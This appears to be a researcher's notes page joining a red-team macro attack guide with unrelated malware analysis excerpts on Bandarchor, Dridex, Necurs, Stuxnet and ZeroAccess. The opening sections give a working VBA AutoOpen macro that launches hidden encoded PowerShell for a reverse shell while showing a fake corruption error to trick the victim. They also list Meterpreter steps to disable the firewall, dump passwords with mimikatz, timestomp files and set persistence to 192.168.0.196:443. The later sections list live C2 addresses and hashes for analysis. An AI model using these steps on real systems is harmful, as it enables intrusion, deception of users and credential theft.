Goal:

• Simulate an advanced adversary using macros with .docm documents and PowerShell to create a beacon-type payload using unicorn.py (thanks to TrustedSec!)
• It is similar to Locky, Cerber, Carbanak payloads minus PowerShell

For the macro attack, you will need to go to File, Properties, Ribbons, and select Developer. Once you do that, you will have a developer tab. Create a new macro, call it AutoOpen and paste the generated code into that. This will automatically run. Note that a message will prompt to the user saying that the file is corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! This is tricking the victim to thinking the excel document is corrupted. You should get a shell through powershell injection after that.

The full script is as follows:

Sub AutoOpen()
Dim x
x = "-window hidden -EncodedCommand " <Base64'ed command>"
Shell ("powershell.exe " & x)
Dim title As String
title = "Critical Microsoft Office Error"
Dim msg As String
Dim intResponse As Integer
msg = "This document appears to be corrupt or missing critical rows in order to restore. Please restore this file from a backup."
intResponse = MsgBox(msg, 16, title)
Application.Quit
End Sub

Attacker's View:

• msfconsole -r unicorn.rn
• [*] Exploit running as background job.
• [*] Started reverse TCP handler on 192.168.0.196:443 
• [*] Starting the payload handler...
• [*] Encoded stage with x86/shikata_ga_nai

Goal:

Simulate a sophisticated adversary by leveraging a compromised website hosting a zip archive via iframe with .hta loader with the PowerShell invocation leading to Meterpreter Reverse TCP Shell.

Steps:

Ø  python unicorn.py windows/meterpreter/reverse_tcp hta (credits to Dave Kennedy)
Ø  host the .hta loader with the encoded Powershell
Ø  msfconsole – r unicorn.rb
Ø  meterpreter shell
  o   getsid
  o   getuid
  o   migrate
  o   getsystem
  o   run checkvm
  o   exploit Windows7 Service Pack 1 msp
  o   use incognito
  o   run countermeasure
  o   run countermeasure –d –k
  o   shell
     §  netsh firewall set opmode disable //disable firewall
  o  run vnc
  o  load mimikatz
  o  ls
  o  upload /home/sathish/mimikatz.exe C:\\
  o  timestop mimikatz.exe -f "C:\\Windows\System32\\cmd.exe"
  o  shell
  o  mimikatz.exe
     §  privilege::debug
     §  inject::process lsass.exe sekurlsa.dll
     §  getLogonPasswords
     §  sekurlsa::logonPasswords full
o   run persistence -A -L C:\\ -X -i 10 -p 443 -r 192.168.0.196
    §  attrib +h c:\autoexec.bat //make it hidden

Source: malware-traffic-analysis.net

​The infection method is as follows:

• www[.]tdca[.]ca - Compromised site
• mapobifi[.]xyz - 85.93.0.110 port 80 – EITest gate
•  ew[.]203kcontractorsarkansas[.]com - 109.234.36.220 port 80 -  Rig EK
• 109.236.87.204 - GET /default.jpg - Post-infection traffic caused by the Bandarchor ransomware
• 109.236.87.204 - POST /yyy/fers.php - Post-infection traffic caused by the Bandarchor ransomware

*Analyze PCAP using filter “http.request”

[*] MD5           : 2dfddbc240cd6e320f69b172c1e3ce58
[*] SHA-1        : e573a6fd61fd3928201d85dbffe5aefe21e49192
[*] SHA-256    : e70614382ad300bd8c1f2cedb3259212057c40433e22ffeee7292ae576c4eae2
 
[+] File Type: EXE
[+] Address of entry point      : 0x00005a82
[+] Image Base Address                     : 0x00400000
[+] Packer / Compiler: MS Visual C++ 8.0

------------------------------------------------------------
Executable         \Windows\explorer.exe
Executable         \jucheck.exe
Web Page           logmeinrescue[.]us[.]com/system/oauth/gate[.]php
Library            ADVAPI32.dll
Library            KERNEL32.dll
Library            SHELL32.dll
Library            USER32.dll
Library            USERENV.dll
Library            WINHTTP.dll
Database           C:\work\treasureHunter\Release\treasureHunter

[+] Sections
            Name: .text     Virtual Address: 0x00001000 Size: 0x0000fcda         Entropy: 6.667572
            Name: .rdata  Virtual Address: 0x00011000 Size: 0x00005eb2        Entropy: 4.641277
            Name: .data    Virtual Address: 0x00017000 Size: 0x00002fe0        Entropy: 3.331543
            Name: .rsrc     Virtual Address: 0x0001a000 Size: 0x000001e0        Entropy: 4.710061
            Name: .reloc   Virtual Address: 0x0001b000 Size: 0x000012a4        Entropy: 6.678696

Tools: CFF Explorer, Ollydbg, FakeNet, IDAPro, ExeScan, SysAnalyzer, pestudio
Environment: Microsoft XP SP1 (Victim), Remnux VM (Analyst)

Takeaways:

• (1) Interesting Registry Anti-Analysis Routines Detected by API Logger
• (2) Used Armadillo Packer v1.71 at OEP 00422856 ​
• (3) Compiled in Microsoft Visual Studio C++ v6.0
• (4) Communicates to the following P2P nodes:
  
  • 188.93.239.28:4843
  • 38.64.199.33:4843
    
  • 85.17.155.148:1234
• (5) Botnet ID is 120.

File: dridex.exe
Size: 221184
Unpacked at OEP 00422856 (Armadillo Packer)


Processes:
PID    ParentPID    User    Path    
--------------------------------------------------
4776    5124    USER-06EF21E8DC:Administrator    C:\Documents and Settings\Administrator\Desktop\dridex.exe    

    [*] MD5     : 86c6b28be7b973a69dd049ec0283e935
    [*] SHA-1     : c075fe462b1254d74798337b71ef1b82a81c4bef
    [*] SHA-256    : a9dd22723f0ad6316c2c87727f5b01319cf703d03799efad44f9d8930c4ce5eb
    [*] Imphash     : a8c14b423f16267d80724d4045aa5bb7


[+] File Type: EXE

[+] Signature [Compiler/Packer]

    ['Armadillo v1.71']

[+] Address of entry point    : 0x00022b56

[+] Image Base Address        : 0x00400000

[+] Sections
    Name: .text    Virtual Address: 0x00001000    Size: 0x00021cec    Entropy: 7.198276
    Name: .rdata    Virtual Address: 0x00023000    Size: 0x0000a896    Entropy: 6.127880
    Name: .data    Virtual Address: 0x0002e000    Size: 0x0001efe4    Entropy: 4.501903
    Name: .rsrc    Virtual Address: 0x0004d000    Size: 0x00003120    Entropy: 4.565060

[+] Anomalies Check

    [*] Header Checksum is zero!

    [-] Import Table

        IA: 0x004230c0    CreateRemoteThread
        IA: 0x004231bc    HttpSendRequestExA
        IA: 0x00423184    HttpQueryInfoA
        IA: 0x004231a4    HttpSendRequestW
        IA: 0x00423110    InternetCloseHandle
        IA: 0x004231ac    InternetGetConnectedState
        IA: 0x004231a0    InternetReadFileExA

Source: https://www.computersecuritystudent.com/FORENSICS/VOLATILITY/VOLATILITY2_2/lesson2/

Basic Stuxnet Description (sophisticated APT worm-like trojan):

1. A normal Windows XP installation has just one instance of lsass.exe that the Winlogon process creates when the system boots. (Wininit creates it on Windows Vista and higher).
2. Process tree reveals that the two new lsass.exe instances were both created by services.exe, the Service Control Manager, which implies that Stuxnet somehow got its code into the Services.exe process.
3. Mrxnet.sys is the driver that implements the rootkit that hides files, and Mrxcls.sys is a second Stuxnet driver file that launches the malware when the system boots. 

​2. vol.py  imageinfo=WinXPSP3x86 -f stuxnet.vmem

Analyze Stuxnet Process Tree
3. vol.py pstree --profile=WinXPSP3x86 -f stuxnet.vmem | egrep '(services.exe|lsass.exe|winlogon.exe)' | tee pstree.txt

Source: SysAnalyzer, Immunity Debugger, IDA Pro

File: necurs_dropper.exe
Size: 97792 Bytes
MD5: 6B3D2D146E683DAF0DEB906D57393E22

Mutex:
PID    Name *    
--------------------------------------------------
1212    Instance0:  ESENT Performance Data Schema Version 40   

Processes:
PID    ParentPID    User    Path    
--------------------------------------------------
2688    872    USER-06EF21E8DC:Administrator    C:\Documents and Settings\Administrator\Desktop\dropper.exe    

Ports:
Port    PID    Type    Path    
--------------------------------------------------
3417    2688    TCP    C:\Documents and Settings\Administrator\Desktop\dropper.exe    
3418    3536    TCP    C:\Documents and Settings\Administrator\Desktop\dropper.exe    
3419    384    TCP    C:\Documents and Settings\Administrator\Desktop\dropper

API Logger:
91222     CreateFileA(\\.\NtSecureSys)    
912c6     GetCurrentProcessId()=2688
771bd3a9     connect( 69.50.214.54:80 )

Scanning for 19 signatures
Scan Complete: 108Kb in 0 seconds

Urls
--------------------------------------------------
<html><head><title>504 Connect to %s failed: host unreachable.</title></head><body><h1>504 Connect to %s failed: host unreachable</h1><p>The following error occurred while trying to access <strong>http://%s%s</strong>:<br><br><strong>504 Connect to %s failed: host unreachable</strong></p></body></html>
http://69.50.214.54/i.php?v=1012&affid=36411
http://69.50.214.54/i.php?v=1012&affid=36414
http://213.229.106.135/mac/mac.php?affid=00100
http://69.50.214.54/i.php?v=1012&affid=36413
http://69.50.214.54/i.php?v=1012&affid=36412
http://69.50.214.54/i.php?v=1012&affid=36410

 Sample: 9e980cd01f46224e27b72369e988d8213436d50e7c3bd24344a8560c4fd23a04
 
VirusTotal : 2/55
McAfee-GW-Edition,BehavesLike.Win32.Ransom.mm,23.01.2016,132
Qihoo-360,HEUR/QVM20.1.Malware.Gen,23.01.2016,132
 
Compilation Timestamp: 0x5680253A (Sun Dec 27 12:51:54 2015)

 Here are the imported libraries:

• ntdll.dll,x,Implicit,21,NT Layer DLL
• kernel32.dll,-,Implicit,3,Windows NT BASE API Client DLL
• shlwapi.dll,-,Implicit,3,Shell Light-weight Utility Library
• gdiplus.dll,-,Implicit,24,Microsoft GDI+

 
Here are the imported blacklisted calls:

• LdrFindResource_U,x,-,-,ntdll.dll
• ZwAllocateVirtualMemory,x,-,-,ntdll.dll
• LdrUnloadDll,x,-,-,ntdll.dll
• LdrAccessResource,x,-,-,ntdll.dll
• LdrGetProcedureAddress,x,-,-,ntdll.dll
• ZwFreeVirtualMemory,x,-,-,ntdll.dll
• memcpy,x,-,-,ntdll.dll
• ExitProcess,x,-,-,kernel32.dll

 
Here are indicators of the PNG dropper calls from gdiplus.dll (enables applications to use graphics and formatted text on both the video display and the printer):

Red Flags:

• The file contains 10 blacklisted strings.
• The symbol (GdipBitmapLockBits) is imported several (8) times/
• The file references the Windows Native API.
• The file opts for Address Space Layout Randomization (ASLR).
• The file ignores Structured Exception Handling (SEH).
• The file has no Version.
• The file does not contain a digital certificate.
• The file checksum (0x00000000) is invalid.

Reference: https://www.virustotal.com/en/file/1f8c42caeacb44f2a738ee2104457220eca6d7a7416f953d01bc716a63b3db8d/analysis/

Objective:

• Analyze the ZeroAccess trojan custom local privilege exploit (LPE) related to CVE-2015-1701.

​CVE-2015-1701:

• Win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in April 2015, aka "Win32k Elevation of Privilege Vulnerability."

Source: fumalwareanalysis.blogspot.com

Learning Goals: 

1. Understand the general interrupt handling  mechanism on X86 platform.
2. Understand the byte scission anti-debugging technique.
3. Know how to use a binary debugger to patch an executable program.

The general anti-debugging techniques are as follows:

(1) to detect the existence of a debugger, and behave differently when a debugger is attached to the current process; and,
(2) to disrupt or crash a debugger.

 The instruction we are trying to analyze is the "INT 2D" instruction located at 0x00413BD5 (as shown in Figure 1). By single-stepping the malware, you might notice that the program's entry point is 0x00413BC8. After the execution of the first 8 instructions, right before the "INT 2D" instruction, the value of EAX is 0x1. This is an important fact you should remember in the later analysis.